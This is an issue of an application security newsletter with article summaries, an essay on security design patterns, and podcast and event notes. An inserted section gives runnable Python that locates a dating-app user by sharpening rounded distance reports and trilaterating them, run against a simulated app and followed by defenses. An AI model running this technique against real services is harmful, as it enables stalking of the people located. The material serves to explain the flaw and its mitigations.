Reasonable 🔐AppSec #48 - Design Patterns, Five Security Articles, and Podcast Corner

A review of application security happenings and industry news from Chris Romeo.

Hey there,

In this week’s issue, please enjoy the following:

  • Five security articles 📰 that are worth YOUR time

  • Featured focus: Design Patterns

  • Application Security Podcast 🎙️Corner

  • Where to find Chris? 🌎

Five Security Articles 📰 that Are Worth YOUR Time

  1. Open Source Security (OpenSSF) and OpenJS Foundations Issue Alert for Social Engineering Takeovers of Open Source Projects

    The Open Source Security Foundation (OpenSSF) and OpenJS Foundation have issued an alert regarding social engineering attacks aimed at open-source projects. These attacks involve tactics like the persistent pursuit of maintainers by unknown community members seeking elevated privileges, which could lead to security breaches. The foundations are raising awareness about these threats and providing guidance to help maintainers secure their projects. [We always knew this was a hidden threat within the software supply chain, and now the theory has become a reality. Other open-source projects must be aware of this scenario and build controls into their project governance structures to prevent it.]

  2. tldrsec/awesome-secure-defaults — "awesome-secure-defaults" curates a list of libraries prioritizing security by default to help eliminate standard vulnerability classes. This resource includes various tools across multiple programming languages to provide developers with secure, easy-to-use solutions for enhancing application security. [I love secure by default. This repo is gold for finding open-source libraries indexed by language to solve the need for common security and privacy controls.]

  3. Secure corporate LLMs using only three patterns — Christophe Parisel outlines three security design patterns essential for securing corporate LLMs in 2024. He highlights the predominant risk of prompt injection, suggesting that other IT risks can be managed with existing security controls. [Design patterns are not new concepts, but they are underutilized. Whenever I see a discussion of a security design pattern, I lean closer to understand it better.]

  4. The Illusion of Privacy: Geolocation Risks in Modern Dating Apps — The article examines the risks of geolocation features in modern dating apps, highlighting how attackers can exploit them to determine users' precise locations. Despite app developers' efforts to enhance privacy, techniques like trilateration can still pinpoint a user's location, posing significant privacy and safety risks, especially in sensitive environments. [We must look closer at every example of a privacy challenge to apply controls better.]

  5. Strategies to monitor and prevent vulnerable driver attacks — The Microsoft Security Experts blog provides strategies for monitoring and preventing attacks via vulnerable drivers, highlighting the need for a multi-layered defense approach. The article discusses the importance of detecting unauthorized access early in the attack chain and adapting security strategies to meet specific organizational needs, offering solutions like Memory Integrity and Smart App Control for robust protection. [This one caught my attention because it’s outside of the usual things we talk about (web apps) regarding development these days. Drivers are the underlying layer that connects hardware to software, and they have not gotten much attention in the last decade.]
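To make the geolocation point in article 4 concrete, here is a small worked example of the trilateration attack against a "distance to this user" feature. It is added to this issue and is not code from the article or from any dating app: the target, the three attacker start points, and the app itself (an oracle that floors the true distance to 100 m) are all constructed. The interesting part is sharpen_distance: rounding the reported distance does not stop the attack, because an attacker who moves a probe one metre at a time can watch for the moment the rounded value ticks over, at which point the true distance is known to about a metre again.

```python
"""
Trilateration of a user's position from rounded distance reports.
Example added to the newsletter, not from the article it accompanies.
All coordinates are constructed sample data; the "app" is a simulated oracle.
"""
import math

EARTH_RADIUS_M = 6_371_000.0


def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres; stands in for the app's server-side distance."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_M * math.asin(math.sqrt(a))


def to_local_xy(lat, lon, lat0, lon0):
    """Equirectangular projection to metres around (lat0, lon0); accurate over a few km."""
    x = math.radians(lon - lon0) * EARTH_RADIUS_M * math.cos(math.radians(lat0))
    y = math.radians(lat - lat0) * EARTH_RADIUS_M
    return x, y


def from_local_xy(x, y, lat0, lon0):
    """Inverse of to_local_xy."""
    lat = lat0 + math.degrees(y / EARTH_RADIUS_M)
    lon = lon0 + math.degrees(x / (EARTH_RADIUS_M * math.cos(math.radians(lat0))))
    return lat, lon


def move(pos, bearing_deg, dist_m):
    """Step a probe dist_m along a compass bearing (0 = north, 90 = east)."""
    lat, lon = pos
    b = math.radians(bearing_deg)
    return from_local_xy(dist_m * math.sin(b), dist_m * math.cos(b), lat, lon)


def trilaterate(probes, distances):
    """Point at the given distances from three probe positions.
    Subtracting the circle equations pairwise leaves a 2x2 linear system in (x, y)."""
    lat0, lon0 = probes[0]
    (x1, y1), (x2, y2), (x3, y3) = [to_local_xy(la, lo, lat0, lon0) for la, lo in probes]
    r1, r2, r3 = distances
    a1, b1 = 2 * (x2 - x1), 2 * (y2 - y1)
    c1 = r1**2 - r2**2 - x1**2 + x2**2 - y1**2 + y2**2
    a2, b2 = 2 * (x3 - x1), 2 * (y3 - y1)
    c2 = r1**2 - r3**2 - x1**2 + x3**2 - y1**2 + y3**2
    det = a1 * b2 - a2 * b1
    if abs(det) < 1e-6:
        raise ValueError("probes are collinear; choose a third probe off the line")
    x = (c1 * b2 - c2 * b1) / det
    y = (a1 * c2 - a2 * c1) / det
    return from_local_xy(x, y, lat0, lon0)


def make_oracle(target, round_to_m):
    """Simulated app endpoint: distance from probe to target, floored to round_to_m."""
    tlat, tlon = target

    def oracle(probe):
        d = haversine_m(probe[0], probe[1], tlat, tlon)
        return math.floor(d / round_to_m) * round_to_m

    return oracle


def sharpen_distance(oracle, start, bearing_deg, step_m=1.0, max_steps=20_000):
    """Walk the probe until the rounded report ticks to a new bucket. At that step
    the true distance equals the bucket edge just crossed, to within step_m.
    Returns (probe_position, distance) usable as a near-exact trilateration input."""
    first = oracle(start)
    pos = start
    for _ in range(max_steps):
        pos = move(pos, bearing_deg, step_m)
        report = oracle(pos)
        if report != first:
            return pos, max(first, report)  # edge crossed, whether walking in or out
    raise RuntimeError("no bucket edge crossed; walk further or change bearing")


def locate(oracle, starts, bearing_deg=90.0):
    """Full attack: sharpen three rounded reports, then trilaterate."""
    probes, dists = [], []
    for s in starts:
        p, d = sharpen_distance(oracle, s, bearing_deg)
        probes.append(p)
        dists.append(d)
    return trilaterate(probes, dists)


# Constructed data: a target and three attacker start points roughly 1-1.5 km away.
TARGET = (37.7749, -122.4194)
STARTS = [(37.7849, -122.4194), (37.7749, -122.4094), (37.7649, -122.4294)]

if __name__ == "__main__":
    est = locate(make_oracle(TARGET, 100), STARTS)
    print("estimate:", est, "error (m):", round(haversine_m(*est, *TARGET), 1))
```

Run it and the estimate lands within a few metres of TARGET even though every individual report the "app" returned was a multiple of 100 m. That is the practitioner's takeaway: rounding the displayed distance is cosmetic. The defenses that hold up are the ones that stop the oracle from ever encoding fine-grained distance, such as snapping the user's own position to a coarse grid before any distance is computed, and rate-limiting or detecting the rapid sequence of position updates the walk needs.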

My talk at the RSA Conference this year is focused on “Secure and Privacy by Design Converge with Threat Modeling.” Through the creation of this talk, I’ve uncovered an old idea that we need to invest in much more: design patterns.

For some reason, from the dawn of computing and system building, requirements have been the driving factor for what we build. Requirements are the standards we must comply with, the statements that govern the properties of features and subsystems. I’m about to share something controversial and counter-cultural for the security purists from the old days: requirements do more harm than good.

Requirements tend to be complex and overwhelming. Think of the OWASP ASVS, a project I’m a big fan of that provides value to our ecosystems and industry. It’s a complicated catalog of stuff you should do. Does anyone comply with the ASVS from end to end? I doubt it. I doubt anyone can say they comply with ASVS for 100% of the requirements listed.

Requirements are also challenging because they state the what but not the how. The what manifests as a statement such as “The product will protect data flows with TLS encryption.” The what is excellent, but how do you do this? How do you make this a reality? That is the part that is missing.

Enter design patterns and the melding of requirements with a reference architecture to make a security control a reality. Design patterns bake multiple requirements into a security control cake and give the implementor a visualization of what they need to build to inherit a pattern's security (or privacy) goodness.

Patterns are where we need to invest going forward. Let’s take the hundreds of requirements and bake them into ten implementable patterns. Perhaps we can lower the complexity bar and move security and privacy forward. That is always my aim.

Podcast 🎙️ Corner

I love making podcasts. In Podcast Corner, you get a single place to see what I’ve put out this week. Sometimes, they are my podcasts. Other times, they are podcasts that have caught my attention.

  • Application Security Podcast

    • Dustin Lehr -- Culture Change through Champions and Gamification (Audio only; YouTube)

      • Dustin Lehr, Senior Director of Platform Security/Deputy CISO at Fivetran and Chief Solutions Officer at Katilyst Security, discusses the role of security champions within the developer community.

      • He describes how developers can become security advocates and the importance of a security-centric culture.

      • He also offers practical advice for organizations aiming to improve security through community-focused strategies.

  • Security Table

    • Prioritizing AppSec: A Conversation Between a VP of Eng, a Product Manager, and a Security "Pro" (Audio only; YouTube)

      • Prompted by fan mail, Chris, Izar, and Matt engage in a role-playing scenario as a VP of engineering, a security person, and a product manager.

      • They explore some challenges and competing perspectives in prioritizing application security. They highlight the importance of empathy, understanding business needs and language, and building organizational relationships while dealing with security threats and solutions.

  • Threat Modeling Podcast

    • The episode is scripted and undergoing editing now. It’s a second part from Nandita, where we discuss things that work and don’t work and how tooling impacts privacy threat modeling.

Pictures are Fun

Multiple requirements are baked into a security control cake.

Where to find Chris? 🌎

  • Webinar: Secure Smarter: Explore Threat Modeling with Devici (live product walkthrough and threat modeling discussion)

    • North America: April 24, 1:00 PM EDT/ 10:00 AM PDT, sign up.

    • EMEA: April 25, 1:00 PM BST / 2:00 PM CEST, sign up.

  • BSides SF, May 4-5, 2024

    • I’ll be hanging out at the Devici booth during the event.

  • RSA, San Francisco, May 6-9, 2024

    • Speaking: Secure and Privacy by Design Converge with Threat Modeling (May 8, 14:25 Pacific)

    • Learning Lab: Threat Modeling Championship: Breaker vs. Builder (May 8, 08:30 Pacific) (This will fill up FAST)

    • I'm hanging out at the Devici booth at the Startup Expo for the rest of the time!

🤔 Have questions, comments, or feedback? I'd love to hear from you!

🔥 Reasonable AppSec is brought to you by Kerr Ventures.

🤝 Want to partner with Reasonable AppSec? Reach out, and let’s chat.